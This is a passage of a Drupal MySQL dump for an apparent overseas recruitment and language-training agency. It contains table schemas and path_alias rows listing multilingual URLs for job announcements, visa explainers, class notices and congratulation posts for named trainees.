  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_image_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_image_alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image''s ''alt'' attribute.',
  `field_image_title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image''s ''title'' attribute.',
  `field_image_width` int UNSIGNED DEFAULT NULL COMMENT 'The width of the image in pixels.',
  `field_image_height` int UNSIGNED DEFAULT NULL COMMENT 'The height of the image in pixels.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for node field field_image.';

-- --------------------------------------------------------

--
-- Table structure for table `node__field_slider_img`
--

CREATE TABLE `node__field_slider_img` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_slider_img_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_slider_img_alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image''s ''alt'' attribute.',
  `field_slider_img_title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image''s ''title'' attribute.',
  `field_slider_img_width` int UNSIGNED DEFAULT NULL COMMENT 'The width of the image in pixels.',
  `field_slider_img_height` int UNSIGNED DEFAULT NULL COMMENT 'The height of the image in pixels.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for node field field_slider_img.';

--
-- Dumping data for table `node__field_slider_img`
--

INSERT INTO `node__field_slider_img` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `field_slider_img_target_id`, `field_slider_img_alt`, `field_slider_img_title`, `field_slider_img_width`, `field_slider_img_height`) VALUES
('slider', 0, 21, 91, 'en', 0, 37, '', '', 1250, 689),
('slider', 0, 22, 92, 'en', 0, 38, '', '', 1250, 689);

-- --------------------------------------------------------

--
-- Table structure for table `node__field_tags`
--

CREATE TABLE `node__field_tags` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_tags_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the target entity.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for node field field_tags.';

-- --------------------------------------------------------

--
-- Table structure for table `path_alias`
--

CREATE TABLE `path_alias` (
  `id` int UNSIGNED NOT NULL,
  `revision_id` int UNSIGNED DEFAULT NULL,
  `uuid` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `path` varchar(255) DEFAULT NULL,
  `alias` varchar(255) DEFAULT NULL,
  `status` tinyint NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The base table for path_alias entities.';

--
-- Dumping data for table `path_alias`
--

INSERT INTO `path_alias` (`id`, `revision_id`, `uuid`, `langcode`, `path`, `alias`, `status`) VALUES
(5, 5, 'f6277d79-d953-4333-9596-572d2eec45ff', 'en', '/node/5', '/announcement/5-positions-those-who-have-passports-and-want-work-general-workers-construction-sites', 1),
(10, 10, '77abb42b-6752-41b4-aefe-b7ca54ac3d6e', 'en', '/node/10', '/announcement/expert-engineers-who-want-work-south-korea-shipyards-electrical-engineer-position-are', 1),
(18, 18, '4cdcff03-12b0-4095-ad5e-c040f6983a7c', 'en', '/node/18', '/announcement/food-beverage-hostess-work-5-stars-hotels-dubai-or-abu-dhabi-are-wanted-desperately', 1),
(53, 53, 'af2620cb-4525-4a43-9ce4-c5c7399e0883', 'ja', '/node/10', '/announcement/韓国の造船所で電気エンジニアのポジションで働きたい経験豊富なエンジニアを緊急で募集しています。', 1),
(54, 54, 'd7bfcbfa-5745-4ca2-83fa-e7c89d094a2c', 'ja', '/node/18', '/announcement/ドバイまたはアブダビの5つ星ホテルで働くフード＆ビバレッジホステスを緊急で求めています。', 1),
(55, 55, '4fa6cfbe-d019-4067-8daa-d1b346a51ec7', 'ko', '/node/10', '/announcement/expert-engineers-who-want-work-south-korea-shipyards-electrical-engineer-position-are', 1),
(56, 56, 'c3b5b605-eac2-4d93-b89f-53e548b91cf8', 'ko', '/node/18', '/announcement/food-beverage-hostess-work-5-stars-hotels-dubai-or-abu-dhabi-are-wanted-desperately', 1),
(61, 61, '8711ceb0-a7e5-433b-863f-7ea667eb4969', 'ko', '/node/5', '/announcement/5-positions-those-who-have-passports-and-want-work-general-workers-construction-sites', 1),
(74, 74, '920fb821-2620-4efa-ab21-37a8df23f551', 'ja', '/node/5', '/announcement/パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています', 1),
(92, 92, 'd2057b9c-c867-4ca5-a073-0e5ac1577a83', 'ja', '/node/62', '/announcement/2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1),
(93, 93, '372c8519-82f8-4835-be91-19596d3505fe', 'en', '/node/62', '/announcement/2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1),
(368, 368, '31664df1-48e8-4938-99c2-9e315eb41f0a', 'ja', '/node/206', '/language-center/title-3', 1),
(369, 369, '1c931e03-fb51-48f1-afa0-9c0cc4985e83', 'ja', '/node/1', '/content/bisheuefusaito', 1),
(370, 370, 'a38a40fe-be35-4979-926a-0aad087d1885', 'en', '/node/1', '/content/about-us', 1),
(371, 371, '39e75320-c074-4926-8baa-80b4dd426f8a', 'ko', '/node/1', '/content/about-us', 1),
(372, 372, 'c1de5199-0d4f-4048-babd-d0f1e44a56ed', 'ja', '/node/3', '/announcement/e-7-3-rongjiekurasunihashuikacanjiasuhekitesuka', 1),
(373, 373, 'aaee57a9-e484-45db-80ba-6e161c817c12', 'en', '/node/3', '/announcement/who-should-attend-e-7-3-welding-class', 1),
(374, 374, 'b0487d02-3bb3-4cc0-889e-187dcc074f84', 'ko', '/node/3', '/announcement/who-should-attend-e-7-3-welding-class', 1),
(375, 375, '315eaf19-4cf5-4518-832a-e7a4a95ab348', 'ja', '/node/4', '/announcement/wanted-desperately', 1),
(376, 376, 'd7f98c68-36ee-4be0-bcd5-5109399a4199', 'en', '/node/4', '/announcement/wanted-desperately', 1),
(377, 377, 'cc998ef8-c639-4b51-96f1-f90f032bd4bd', 'ko', '/node/4', '/announcement/contact-us-more-information', 1),
(378, 378, 'cb58e1d1-7d92-4853-afc3-b7e2feb341d1', 'ja', '/node/6', '/activities/e7', 1),
(379, 379, 'd27ffc7d-cee2-4059-ac5a-358b2ec18100', 'en', '/node/6', '/activities/order-get-employed-shipyard-korea-e7-3-visa-trainees-are-explained-what-needed-quickly', 1),
(380, 380, '4f6f6e8f-d438-4176-85a9-f86697e2652e', 'ko', '/node/6', '/activities/kiuriiyaaniungngnri-sngbheaakngkiu-e7-3-viza-nai-saareaakniungphiu-sngttnsaamaakiu', 1),
(381, 381, 'a6a8225b-8ecd-4721-bcf0-dead0a4e3a65', 'ja', '/node/7', '/activities/e-7hisahawaiguorenniduisurutedingnengliwochitsufangnotamenotebienahisatesu', 1),
(382, 382, '7f6fab49-0f03-4685-8175-db00a8ac86c7', 'en', '/node/7', '/activities/e-7-visa-special-ability-visa-foreign-nationals', 1),
(383, 383, 'fc903fe8-8502-4691-8fe9-9eaac983797f', 'ko', '/node/7', '/activities/e-7-visa-special-ability-visa-foreign-nationals', 1),
(384, 384, 'ac443fba-5167-493d-9d42-a73477f6aaf5', 'ja', '/node/8', '/activities-0', 1),
(385, 385, '90c5cd9f-dd74-462f-8eca-77591321f36e', 'en', '/node/8', '/activities/wanted-people-who-want-work-welder-expert-welding-technician-korea-shipyard', 1),
(386, 386, 'be8c8556-54d9-4642-b8be-7dfa64109b0e', 'ko', '/node/8', '/activities/korea-sngbheaakngttng-welder-kmkng-ghecheaapnnyaarng-aphc-saareaak-lupkiungliusuumaa', 1),
(387, 387, 'e50dd201-d26c-44b4-aaac-f0bb9f406272', 'ja', '/node/9', '/activities-1', 1),
(388, 388, '2c0d82e9-6dad-44ac-9aa5-e514cc246028', 'en', '/node/9', '/activities/first-batch-welding-trainees-new-comet-trading-agency-coltd-sinmalike-shipyard-was-met', 1),
(389, 389, '3a1b9ad4-8fe1-4d98-bfcf-bb899957fc65', 'ko', '/node/9', '/activities/chngmliuk-sngbheaakngm-new-comet-trading-agency-coltd-m-pthmasutt-ghecheaa', 1),
(390, 390, '872a80d3-689d-4f59-9195-a10bd8f357bf', 'ja', '/node/11', '/content/owenihewase', 1),
(391, 391, 'd9f05d4c-6a80-44bb-93c4-306f41d001ec', 'en', '/node/11', '/content/contact-us', 1),
(392, 392, 'c670c701-0bae-4e92-8165-7dc243a13893', 'ko', '/node/11', '/content/yeonlagcheo', 1),
(393, 393, '7c4ed44a-e14d-43ec-a7b7-4ed6ad09cbb9', 'ja', '/node/17', '/activities-2', 1),
(394, 394, 'd6a48e3b-6d69-4bae-aaec-d8b3d4856854', 'en', '/node/17', '/activities/first-batch-welding-trainees-new-comet-trading-agency-coltd-sinmalai-shipyard-was-met', 1),
(395, 395, '22220445-0860-4cd3-9068-24bc357bb4ea', 'ko', '/node/17', '/activities/chngmliuksngbheaakngm-new-comet-trading-agency-coltd-m-pthmasuttghecheaasngttnsaamaaaaa', 1),
(396, 396, 'e998d3b9-5cfe-471c-a71b-cf6cb6626e53', 'ja', '/node/19', '/activities/di1hatsuchikara60renyishangnofangkarongjiejishuzhenoe-7', 1),
(397, 397, 'd89c6b85-7128-4b45-b7e4-cc8076f73d1a', 'en', '/node/19', '/activities/over-60-people-1st-batch-came-register-koshipa-skill-test-go-korea-welding-technician', 1),
(398, 398, '5be3c88f-8f25-4a9f-b4ca-5777eb31f84e', 'ko', '/node/19', '/activities/over-60-people-1st-batch-came-register-koshipa-skill-test-go-korea-welding-technician', 1),
(399, 399, 'd832c5e4-f06e-4b88-a34e-b03c445f81fa', 'ja', '/node/20', '/activities/di2huisheng-yanxiushengdatojinian', 1),
(400, 400, '93e8c085-12ed-4560-8502-5db56942ab93', 'en', '/node/20', '/activities/memorial-photo-2nd-batch-welding-students', 1),
(401, 401, '06f49ddf-bbe1-48e7-b27b-dd1498a73e78', 'ko', '/node/20', '/activities/memorial-photo-2nd-batch-welding-students', 1),
(402, 402, '23d51207-9de6-4d30-aeee-86148bad0493', 'ja', '/node/23', '/content/huisheqingbao', 1),
(403, 403, 'b826cd99-851c-4ba1-afca-3c122164dbd2', 'en', '/node/23', '/content/company-profile', 1),
(404, 404, '217c838a-0a09-4b01-a9aa-611e591b8892', 'ko', '/node/23', '/content/hoesa-seollib', 1),
(405, 405, '2dbc954e-db38-4b1a-a338-6e2d9c1dbc77', 'ja', '/node/24', '/content/shiyeneirong', 1),
(406, 406, 'e5eba280-7385-4c36-aae8-ab343a429994', 'en', '/node/24', '/content/our-services', 1),
(407, 407, 'b970100a-f950-4375-8cc6-9d2dd7a545d3', 'ko', '/node/24', '/content/hoesa-seobiseu', 1),
(408, 408, 'add07b26-a5e5-45b1-98ba-8499de50209b', 'ja', '/node/25', '/content/mubiao-mitsushiyon', 1),
(409, 409, 'c65a6a38-b0eb-4d5e-baf5-9b56355424cc', 'en', '/node/25', '/content/vision-mission', 1),
(410, 410, '1bad9602-c163-477f-9764-c925cbf134a0', 'ko', '/node/25', '/content/uliui-bijyeon-uliui-misyeon', 1),
(411, 411, 'dc6d618f-cd2a-4ee6-b92f-c5b60521efff', 'ja', '/node/26', '/content/huishenomubiao', 1),
(412, 412, '7106b67b-d035-4bbd-b4df-f2c6083a3f8b', 'en', '/node/26', '/content/future-goal', 1),
(413, 413, '8ab3830f-7574-417f-8c70-6d6afb45a492', 'ko', '/node/26', '/content/hoesaui-milae-bijeon', 1),
(414, 414, 'a221f0e0-298c-4a20-854a-e1a86728dffa', 'ja', '/node/27', '/content/huisheyange', 1),
(415, 415, '385243ce-b90d-492d-ab7a-2674ce27fba2', 'en', '/node/27', '/content/company-history', 1),
(416, 416, 'fe7289b4-cb7c-47e7-bd8d-d74c68fd4034', 'ko', '/node/27', '/content/company-history', 1),
(417, 417, '8df37cb0-9d7f-4c54-963e-0987c0ccfa0e', 'ja', '/node/28', '/activities/hit-language-center-hanew-comet-trading', 1),
(418, 418, '569314b7-219f-4273-a9e0-9756be0e9cbd', 'en', '/node/28', '/activities/hit-language-center-has-started-teaching-korean-language-courses-and-japanese-language', 1),
(419, 419, 'ab00a258-303c-4dfa-87ab-7cd1e9894ac3', 'ko', '/node/28', '/activities/hit-language-center-neun-new-comet-trading-agencywaui-hyeoblyeogeulo-hangugeo-koseuwa', 1),
(420, 420, '56af7b9f-b5c7-460e-94f7-b2849add9a12', 'ja', '/node/29', '/activities/new-comet-trading-agencynohanguocedandangzhemrhongkahit-language-centertekoshipa', 1),
(421, 421, 'b08bed5d-59f3-4f3f-a368-84cbf876a1ab', 'en', '/node/29', '/activities/person-charge-korean-side-new-comet-trading-agency-mrhong-explained-question-when-you', 1),
(422, 422, '4e680f1b-20cb-4690-a0c9-409b043e550a', 'ko', '/node/29', '/activities/new-comet-trading-agencyui-hangug-cheug-damdangjain-hongssiga-hit-language-centereseo', 1),
(423, 423, 'b0f92881-7d2b-4fa5-bdc2-d21380bda09b', 'ja', '/node/30', '/announcement/yixianoshulianlaodongzhewoshinkahorutejinjiniqiumeteimasu', 1),
(424, 424, '7f241f08-8562-4856-95b7-ef2524639708', 'en', '/node/30', '/announcement/we-urgently-need-following-skilled-workers-work-singapore', 1),
(425, 425, '3a959375-1fc4-48b1-a42b-28e1804eaa20', 'ko', '/node/30', '/announcement/gingeubhage-daeumgwa-gateun-suglyeon-nodongjadeuli-singgapoleueseo-ilhal-pilyoga', 1),
(426, 426, '856f2bec-d1d3-46ea-a076-8db85f759045', 'en', '/node/31', '/announcement/we-are-looking-professional-welders-who-wants-work-korean-shipyards', 1),
(427, 427, '243ca068-fbd8-4766-8660-6e8667ada00d', 'en', '/node/66', '/announcement/exciting-news-japanese-language-enthusiasts', 1),
(428, 428, 'f53e0adc-e592-45cd-a9ea-21acf7bb4a61', 'ja', '/node/67', '/activities/wishing-everyone-happy-new-day', 1),
(429, 429, '19b4a097-8ebb-48ca-84c7-7cb3796575e2', 'ja', '/node/68', '/activities/congratulations-22-4-2024', 1),
(430, 430, 'c2d4bd88-7560-419f-83be-7caa2016f83e', 'en', '/node/68', '/activities/congratulations-22-4-2024', 1),
(431, 431, '5ff84f16-132a-4285-99ee-dd853995679b', 'ja', '/node/69', '/activities/congratulations-9-4-2024', 1),
(432, 432, '1fde37cf-6662-4429-82f7-f99916f4cdf8', 'en', '/node/69', '/activities/congratulations-9-4-2024', 1),
(433, 433, '885ad0b6-2803-4da3-8720-0d9fb5db540a', 'ja', '/node/70', '/activities/congrats', 1),
(434, 434, '26770618-4e5c-4d64-8ceb-efb3000b8fc2', 'en', '/node/70', '/activities/congrats', 1),
(435, 435, '098f5088-298e-476e-99ff-cc8df6d010bf', 'ja', '/node/71', '/activities/congratulations', 1),
(436, 436, '6d9c20e4-ee8f-4038-9525-e1452f527675', 'en', '/node/71', '/activities/congratulations', 1),
(437, 437, 'a6f51c07-45af-4967-bb5d-48d05069c0e9', 'ja', '/node/72', '/activities/congratulations-0', 1),
(438, 438, '008781f8-f887-46d6-932d-13d5486c3585', 'en', '/node/72', '/activities/congratulations-0', 1),
(439, 439, 'e3169efb-64ed-4f3d-821c-2b76696d97e6', 'ja', '/node/73', '/activities/congratulations-19-5-2024', 1),
(440, 440, '961468cf-d2dc-4218-82d4-ce304c0122df', 'en', '/node/73', '/activities/congratulations-19-5-2024', 1),
(441, 441, 'bac87596-fb92-4eac-a1f5-fab375ad748a', 'ja', '/node/74', '/activities/congratulations-1', 1),
(442, 442, '4e5a4613-b388-421b-9c8a-b6dcf33c7d86', 'en', '/node/74', '/activities/congratulations-1', 1),
(443, 443, 'a02bbe80-07ff-4082-8c6f-764ee37c5464', 'ja', '/node/75', '/activities/chit-sayah-oosanometetoukosaimasu', 1),
(444, 444, 'efe77c35-a80d-456a-b7cb-3bde80013736', 'en', '/node/75', '/activities/congratulations-chit-sayah-oo', 1),
(445, 445, '2a9bc8df-5042-43d8-8bcf-56bcb3b2c97e', 'ja', '/node/76', '/activities/congratulations-19-5-2024-0', 1),
(446, 446, '7dfb5e07-e078-458c-ad8a-f4a8fbf20175', 'en', '/node/76', '/activities/congratulations-19-5-2024-0', 1),
(447, 447, '7ce69f73-71e7-4a43-8411-8674e2c40e31', 'ja', '/node/77', '/activities/congratulations-25-6-2024', 1),
(448, 448, 'eb189c2e-9301-48a6-a527-0acd8a25e6c5', 'en', '/node/77', '/activities/congratulations-25-6-2024', 1),
(449, 449, '6e465280-0527-4e1c-9398-2508a4d9b068', 'ja', '/node/78', '/activities/congratulations-13-6-2024', 1),
(450, 450, '27796796-c6a8-4763-a996-0ac234fcf6cd', 'en', '/node/78', '/activities/congratulations-13-6-2024', 1),
(451, 451, '6569e51b-370e-4540-8ac6-96ef8b5fca1d', 'en', '/node/79', '/activities/congratulations-2-6-2024', 1),
(452, 452, '578600b3-d5b6-4f9c-989b-d31a11c01d76', 'ja', '/node/80', '/activities/congratulations-2-6-2024', 1),
(453, 453, '070e5266-5316-4e83-903f-5b0ef0daea14', 'en', '/node/80', '/activities/congratulations-2-6-2024-0', 1),
(454, 454, '80e1c7f9-8872-43de-820c-9153964c7c21', 'ja', '/node/81', '/activities/congratulations-passing-interview-kaung-myat-soe', 1),
(455, 455, 'fc541d98-761e-4f94-8c66-90f144e77aec', 'en', '/node/81', '/activities/congratulations-passing-interview-kaung-myat-soe', 1),
(456, 456, 'dfcfca7b-c8df-4301-8799-81e3c7296fc8', 'ja', '/node/82', '/activities/myo-khantometetoukosaimasu', 1),
(457, 457, 'e9f1cb26-7599-4580-8734-fa93da44571e', 'en', '/node/82', '/activities/congratulations-myo-khant', 1),
(458, 458, 'f7f6d1c2-3811-4e1c-a1cd-c255a8344c3e', 'ja', '/node/83', '/activities/congratulation-getting-coe', 1),
(459, 459, '44a9095c-7ae2-49ad-9fca-07e83aa56eae', 'en', '/node/83', '/activities/congratulation-getting-coe', 1),
(460, 460, '51fedaca-5565-49af-991b-fb07800dd8e3', 'ja', '/node/84', '/activities/ye-mong-aungometetoukosaimasu', 1),
(461, 461, '2972ebb0-4e57-4fb0-a384-5539d30ddb11', 'en', '/node/84', '/activities/congratulations-ye-mong-aung', 1),
(462, 462, '5b48d8e0-2b8a-4d2e-9194-1c8590fd49f3', 'ja', '/node/85', '/activities/congratulations-paing-myo-zaw', 1),
(463, 463, '5a2c43e0-f85f-424a-b683-534481492a33', 'en', '/node/85', '/activities/congratulations-paing-myo-zaw', 1),
(464, 464, '96f3415a-4581-4cfe-98aa-767ba5bac7ca', 'ja', '/node/86', '/activities/congratulations-getting-coe', 1),
(465, 465, '3a480ab4-8f3c-4154-9f04-04871c8be871', 'en', '/node/86', '/activities/congratulations-getting-coe', 1),
(466, 466, '7bfcb614-dd0e-4a3c-823c-7c50cf23978d', 'ja', '/node/87', '/activities/things-beware-while-working-japan', 1),
(467, 467, '2564692a-5cae-498d-9095-99e5ee4b9ce0', 'en', '/node/87', '/activities/things-beware-while-working-japan', 1),
(468, 468, 'd47ff4d3-661a-487d-bfb0-8f0706449ccb', 'ja', '/node/88', '/activities/congratulation-getting-coe-0', 1),
(469, 469, 'a4b4c561-7bfa-4037-9687-8a5ec3320485', 'en', '/node/88', '/activities/congratulation-getting-coe-0', 1),
(470, 470, 'a2a5dc32-64ff-460c-ba40-1e6389cc7108', 'ja', '/node/89', '/activities/congratulations-getting-coe-0', 1),
(471, 471, '01d98eb1-3d54-4c8c-aa02-6de10346dbc0', 'en', '/node/89', '/activities/congratulations-getting-coe-0', 1),
(472, 472, '9c045d2a-6a7d-40d8-8d9d-de259e3c44c9', 'ja', '/node/90', '/activities/chaw-chit-kyawometetoukosaimasu', 1),
(473, 473, '914d2bd2-5a79-478c-85ca-30aa0c64630c', 'en', '/node/90', '/activities/congratulations-chaw-chit-kyaw', 1),
(474, 474, '6279f973-39bb-4058-ac23-044deb8ad161', 'ja', '/node/91', '/activities/congratulations-getting-coe-1', 1),
(475, 475, 'a25a790e-e3de-4ef6-9aff-821fc4bac312', 'en', '/node/91', '/activities/congratulations-getting-coe-1', 1),
(476, 476, '6d351947-dd9c-4291-8cfb-056486488b51', 'ja', '/node/92', '/activities/congratulations-getting-coe-2', 1),
(477, 477, '25a3a843-93f5-45d4-b7c1-ef843eab4a87', 'en', '/node/92', '/activities/congratulations-getting-coe-2', 1),
(478, 478, 'd1a54f35-ce94-4adb-bb16-580e4bf0b0c6', 'ja', '/node/93', '/activities/congratulations-getting-coe-3', 1),
(479, 479, 'e654e082-0f64-4eb2-ba16-7473d8071389', 'en', '/node/93', '/activities/congratulations-getting-coe-ometetou-ya-min-thet-santo-shin-thant-phyu-sancoe', 1),
(480, 480, '4a5e0e7b-5bc0-490f-889b-bb3a98485848', 'en', '/node/94', '/activities/congratulations-getting-coe-3', 1),
(481, 481, '42a5dfcb-4ee9-4db5-b20f-d4860cc3f6cf', 'ja', '/node/95', '/activities/activities-2nd-batch-job-trainingrestaurant', 1),
(482, 482, 'efd3cb68-8b0a-4eee-81a4-b9cb6311a686', 'en', '/node/95', '/activities/activities-3th-batch-job-trainingrestaurant', 1),
(483, 483, '84507b48-acc7-48d1-b71f-9af0ca4a0233', 'ja', '/node/96', '/activities/congralutations-getting-coe', 1),
(484, 484, 'a96d29e0-ca69-45e3-b22d-7f33a58fbe1b', 'en', '/node/96', '/activities/congralutations-getting-coe', 1),
(485, 485, '7e24dfd5-11b3-467d-993e-c27c925b6a1b', 'ja', '/node/97', '/activities/congralutations-getting-coe-0', 1),
(486, 486, 'fcddf560-f3f4-46d6-85e2-05f3725a21f2', 'en', '/node/97', '/activities/congralutations-getting-coe-0', 1),
(487, 487, '97219246-e747-4a78-8ed5-3b94bd84f069', 'ja', '/node/98', '/activities/2nd-batch-pratical-class-restaurant', 1),
(488, 488, '17e27cce-8156-43e1-ad31-58ea9e325ae0', 'en', '/node/98', '/activities/2nd-batch-pratical-class-restaurant', 1),
(489, 489, '92f94cc8-6f0e-495a-90eb-13a4b1098256', 'ja', '/node/99', '/activities/congralutations-getting-coe-1', 1),
(490, 490, '2f7615ea-27d1-4791-9825-3acc4cfc1a0d', 'en', '/node/99', '/activities/congralutations-getting-coe-1', 1),
(491, 491, 'fb341c0c-bbdc-44bd-8415-5b25abf3a9e8', 'ja', '/node/100', '/activities/congratulations-bo-bo-zaw', 1),
(492, 492, 'bf49b635-43c0-4374-9be2-55d41ca5cd63', 'en', '/node/100', '/activities/congratulations-bo-bo-zaw', 1),
(493, 493, 'a22e8a61-bf88-4e5e-8a1f-7f80479ee90f', 'ja', '/node/101', '/activities/congratulations-yamin-phyo', 1),
(494, 494, 'c1741c0f-0973-4835-ac03-d7f7e5aa413b', 'en', '/node/101', '/activities/congratulations-yamin-phyo', 1),
(495, 495, '13ffcb47-0137-4aab-9883-e5b12ac010b4', 'ja', '/node/102', '/activities/congrats-thae-su-yati-soe', 1),
(496, 496, '2869ea6e-97a2-4983-a650-7d1b41c3b061', 'en', '/node/102', '/activities/congrats-thae-su-yati-soe', 1),
(497, 497, '16694281-f261-4482-95fb-7da4c12bf991', 'ja', '/node/103', '/activities/congratulations-getting-coe-4', 1),
(498, 498, '27dbb723-88bb-4a82-b756-c2223b703332', 'en', '/node/103', '/activities/congratulations-getting-coe-4', 1),
(499, 499, '724ee84d-d31e-492f-bbc0-b673df1cd034', 'ja', '/node/104', '/activities/congratulations-khaing-sapal-oo', 1),
(500, 500, '66e71709-4d0e-4cb4-b38e-cbc630055424', 'en', '/node/104', '/activities/congratulations-khaing-sapal-oo', 1),
(501, 501, 'db425c3b-df6d-4538-9e02-925b75f53c69', 'ja', '/node/105', '/activities/congratulations-getting-coe-5', 1),
(502, 502, '51ef1f44-8b2d-4da0-81ce-06c50bde6527', 'en', '/node/105', '/activities/congratulations-getting-coe-5', 1),
(503, 503, 'e0218899-4a52-4695-bfa1-73d83d8bdcaf', 'ja', '/node/106', '/activities/congrats-khaing-thaw-thaw-khant', 1),
(504, 504, '6aa574ec-1019-4300-a4c3-8863cb80ebc5', 'en', '/node/106', '/activities/congrats-khaing-thaw-thaw-khant', 1),
(505, 505, 'afc4b7eb-1eb9-40f8-ba47-7ae757b99092', 'ja', '/node/107', '/activities/congratulations-pyae-sone-thu', 1),
(506, 506, '5f82116c-ddb2-4d4d-80c4-39a7c220e59b', 'en', '/node/107', '/activities/congratulations-pyae-sone-thu', 1),
(507, 507, 'f9ceafae-fe10-4b64-95eb-43b11ac48e30', 'ja', '/node/108', '/activities/congratulations-getting-coe-6', 1),
(508, 508, 'aaec71dc-156b-4311-adcf-b2dce5918141', 'en', '/node/108', '/activities/congratulations-getting-coe-6', 1),
(509, 509, 'b5ec63d3-10f0-461d-a9ac-480ab7104871', 'ja', '/node/109', '/activities/congrats-chan-myae-thu', 1),
(510, 510, '1cb2759a-deae-44e9-bd21-e358a80b8fc6', 'en', '/node/109', '/activities/congrats-chan-myae-thu', 1),
(511, 511, '298f4ccc-7ff9-48f6-a1b2-effc34954639', 'ja', '/node/110', '/activities/congratulations-yaw-chang', 1),
(512, 512, 'ad45bdd6-82ce-4680-b69a-bc026ef596a5', 'en', '/node/110', '/activities/congratulations-yaw-chang', 1),
(513, 513, 'a5b663cf-75e3-441b-9d8f-f74c5fe78746', 'ja', '/node/111', '/activities/congratulations19-5-2024', 1),
(514, 514, 'e0736cc8-3561-47a3-9a6b-11b625c795bc', 'en', '/node/111', '/activities/congratulations19-5-2024', 1),
(515, 515, '16ba7874-fd3e-4b6b-9ec0-f5b952e24973', 'ja', '/node/112', '/activities/congrats-adin-min-maw-min-khant-kyaw', 1),
(516, 516, '761c12cc-d77f-4a2f-95f3-74986d1e9800', 'en', '/node/112', '/activities/congrats-adin-min-maw-min-khant-kyaw', 1),
(517, 517, '3c5cf909-07fa-418b-9d2e-8eb072e58091', 'ja', '/node/113', '/activities/congratulations29-5-2024', 1),
(518, 518, '42e5e96a-2b87-4b84-a63a-016e9c75c795', 'en', '/node/113', '/activities/congratulations29-5-2024', 1),
(519, 519, 'e27c05ec-4261-4a8a-8525-07c22f952a5e', 'ja', '/node/114', '/activities/congrats-yu-mon-aung-may-myo-khaing', 1),
(520, 520, 'a5ce8c4c-41ab-4b0d-a767-e756fc5b09d4', 'en', '/node/114', '/activities/congrats-yu-mon-aung-may-myo-khaing', 1),
(521, 521, '29854d3b-1210-4760-9bef-e131fbe9f97d', 'ja', '/node/115', '/activities/congrats-li-soung-oo-thandar-moe-khu-richard-pyae-sone-aung', 1),
(522, 522, 'f84a9d3f-db3b-45b4-9e63-57dc5a83788d', 'en', '/node/115', '/activities/congrats-li-soung-oo-thandar-moe-khu-richard-pyae-sone-aung', 1),
(523, 523, '458304ec-c307-4273-8fc6-b6ece697a9b2', 'ja', '/node/116', '/activities/images-2th-batch-resturtant-internship', 1),
(524, 524, '7f5e5867-7288-4cef-a1a9-a3811fee7dee', 'en', '/node/116', '/activities/images-2th-batch-resturtant-internship', 1),
(525, 525, '0c83e327-8452-4c32-be57-db3fba2648c2', 'ja', '/node/117', '/activities/congrats-ei-eaindra-aung', 1),
(526, 526, '676a01a8-4c64-41b4-b51c-e028b83c0040', 'en', '/node/117', '/activities/congrats-ei-eaindra-aung', 1),
(527, 527, '62d81651-5100-40d6-ba62-78de51ce5627', 'ja', '/node/118', '/activities/congrats-aung-thura', 1),
(528, 528, 'db7a0412-fb93-4192-9c9c-feb8667736eb', 'en', '/node/118', '/activities/congrats-aung-thura', 1),
(529, 529, '41ae3351-b4cb-4491-9d7d-55af01863f1a', 'ja', '/node/119', '/activities/congrats-thatoe-aung', 1),
(530, 530, '6ed13ce9-4900-4571-9605-427d032fbe36', 'en', '/node/119', '/activities/congrats-thatoe-aung', 1),
(531, 531, 'd1ad112e-ffff-4565-9b1a-87ac1d138d40', 'ja', '/node/120', '/activities/bosss-treatment-celebrate-interview-passed-student', 1),
(532, 532, '1ffe7d5e-73c1-4d09-a3bc-c6cd1e27b879', 'en', '/node/120', '/activities/bosss-treatment-celebrate-interview-passed-student', 1),
(533, 533, '8118b0e3-599a-48af-98fd-8b267b6e6690', 'ja', '/node/121', '/activities/congrats-yee-yee-thant-nay-lin-aung', 1),
